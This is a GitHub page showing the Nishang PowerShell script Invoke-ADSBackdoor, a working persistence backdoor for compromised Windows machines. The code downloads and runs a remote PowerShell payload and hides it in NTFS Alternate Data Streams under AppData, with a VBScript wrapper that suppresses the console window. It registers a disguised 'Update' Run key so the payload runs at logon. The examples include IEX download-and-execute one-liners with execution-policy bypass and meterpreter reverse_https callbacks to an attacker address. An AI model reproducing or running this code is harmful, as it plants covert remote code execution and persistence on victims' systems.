Permalink
Cannot retrieve contributors at this time
Name already in use
A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
nishang/Backdoors/Invoke-ADSBackdoor.ps1
Go to fileThis commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
94 lines (71 sloc)
4.28 KB
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Invoke-ADSBackdoor{ | |
| <# | |
| .SYNOPSIS | |
| Nishang Script that will use Alternate Data Streams and Windows Registry to achieve persistence. | |
| Author: Matt Nelson (@enigma0x3) | |
| .DESCRIPTION | |
| This script will obtain persistence on a Windows 7+ machine under both Standard and Administrative accounts by | |
| using two Alternate Data Streams. The first Alternate Data stream stores the payloadand the second Alternate Data Stream | |
| stores some VBScript that acts as a wrapper in order to hide the DOS prompt when invoking the data stream containing the | |
| payload. When passing the arguments, you have to include the function and any parameters required by your payload. | |
| The arguments must also be in quotation marks. | |
| .PARAMETER PayloadURL | |
| URL of the powershell script which would be executed on the target. | |
| .PARAMETER Arguments | |
| Arguments to the powershell script to be executed on the target. | |
| .EXAMPLE | |
| PS > Invoke-ADSBackdoor -PayloadURL http://192.168.1.138/payload.ps1 -Arguments "hack" | |
| Use above command to use function "Hack" in payload.ps1 for persistence | |
| .EXAMPLE | |
| PS > Invoke-ADSBackdoor -PayloadURL http://192.168.254.1/Powerpreter.psm1 -Arguments HTTP-Backdoor "http://pastebin.com/raw.php?i=jqP2vJ3x http://pastebin.com/raw.php?i=Zhyf8rwh start123 stopthis | |
| Use above to execute HTTP-Backdoor from Powerpreter | |
| .EXAMPLE | |
| PS > Invoke-ADSBackdoor -PayloadURL http://192.168.1.138/Invoke-Shellcode.ps1 -Arguments "Invoke-Shellcode | |
| -Lhost 192.168.1.138 -LPort 2222 -Payload windows/meterpreter/reverse_https -Force" | |
| Above command will use the function Invoke-Shellcode in Invoke-Shellcode.ps1 to shovel meterpreter back to 192.168.1.138 on port | |
| 2222 over HTTPS. | |
| .EXAMPLE | |
| meterpreter>shell | |
| Process 4780 created. | |
| Channel 1 created. | |
| Microsoft Windows [Version 6.1.7601] | |
| Copyright (c) 2009 Microsoft Corporation. All rights reserved. | |
| C:\>powershell.exe -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.138/Invoke-ADSBackdoor.ps1'); Invoke-ADSBackdoor | |
| -URL http://192.168.1.138/Invoke-Shellcode.ps1 | |
| -Arguments 'Invoke-Shellcode -LHost 192.168.1.138 -LPort 666 -Payload windows/meterpreter/reverse_https -Force'" | |
| This will execute the persistence script using Invoke-Shellcode as the payload from a meterpreter session | |
| .LINK | |
| https://enigma0x3.wordpress.com/2015/03/05/using-alternate-data-streams-to-persist-on-a-compromised-machine/ | |
| https://github.com/enigma0x3/Invoke-AltDSBackdoor/blob/master/Invoke-ADSBackdoor.ps1 | |
| https://github.com/samratashok/nishang | |
| #> | |
| [CmdletBinding()] Param( | |
| [Parameter(Mandatory=$True)] | |
| [string]$PayloadURL, | |
| [Parameter(Mandatory=$False)] | |
| [String]$Arguments | |
| ) | |
| $TextfileName = [System.IO.Path]::GetRandomFileName() + ".txt" | |
| $textFile = $TextfileName -split '\.',([regex]::matches($TextfileName,"\.").count) -join '' | |
| $VBSfileName = [System.IO.Path]::GetRandomFileName() + ".vbs" | |
| $vbsFile = $VBSFileName -split '\.',([regex]::matches($VBSFileName,"\.").count) -join '' | |
| #Store Payload | |
| $payloadParameters = "IEX ((New-Object Net.WebClient).DownloadString('$PayloadURL')); $Arguments" | |
| $encodedPayload = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($payloadParameters)) | |
| $payload = "powershell.exe -ep Bypass -noexit -enc $encodedPayload" | |
| #Store VBS Wrapper | |
| $vbstext1 = "Dim objShell" | |
| $vbstext2 = "Set objShell = WScript.CreateObject(""WScript.Shell"")" | |
| $vbstext3 = "command = ""cmd /C for /f """"delims=,"""" %i in ($env:UserProfile\AppData:$textFile) do %i""" | |
| $vbstext4 = "objShell.Run command, 0" | |
| $vbstext5 = "Set objShell = Nothing" | |
| $vbText = $vbstext1 + ":" + $vbstext2 + ":" + $vbstext3 + ":" + $vbstext4 + ":" + $vbstext5 | |
| #Create Alternate Data Streams for Payload and Wrapper | |
| $CreatePayloadADS = {cmd /C "echo $payload > $env:USERPROFILE\AppData:$textFile"} | |
| $CreateWrapperADS = {cmd /C "echo $vbtext > $env:USERPROFILE\AppData:$vbsFile"} | |
| Invoke-Command -ScriptBlock $CreatePayloadADS | |
| Invoke-Command -ScriptBlock $CreateWrapperADS | |
| #Persist in Registry | |
| New-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name Update -PropertyType String -Value "wscript.exe $env:USERPROFILE\AppData:$vbsFile" -Force | |
| Write-Output "Process Complete. Persistent key is located at HKCU:\Software\Microsoft\Windows\CurrentVersion\Run\Update" | |
| } | |